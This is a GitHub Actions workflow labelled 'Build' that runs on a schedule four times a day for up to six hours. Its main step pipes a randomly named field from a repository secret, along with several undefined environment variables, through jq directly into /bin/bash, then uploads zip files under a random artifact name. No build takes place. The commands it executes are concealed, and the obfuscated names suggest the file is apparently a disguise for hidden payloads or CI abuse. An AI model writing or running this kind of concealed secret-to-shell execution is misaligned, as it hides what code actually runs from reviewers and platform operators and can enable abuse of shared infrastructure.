name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '34 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          n23: ${{ secrets.n23 }}
        run: |
          printf '%s' "$n23" | jq -r .xsv7269 | /bin/bash
          echo $moafd8699 | jq -r .jf889 | /bin/bash
          echo $e1886 | jq -r .afu553 | /bin/bash
          printf '%s' "$ipfh9772" | jq -r .mgzw324 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: daicYYNa
          path: "*.zip"
          retention-days: 1
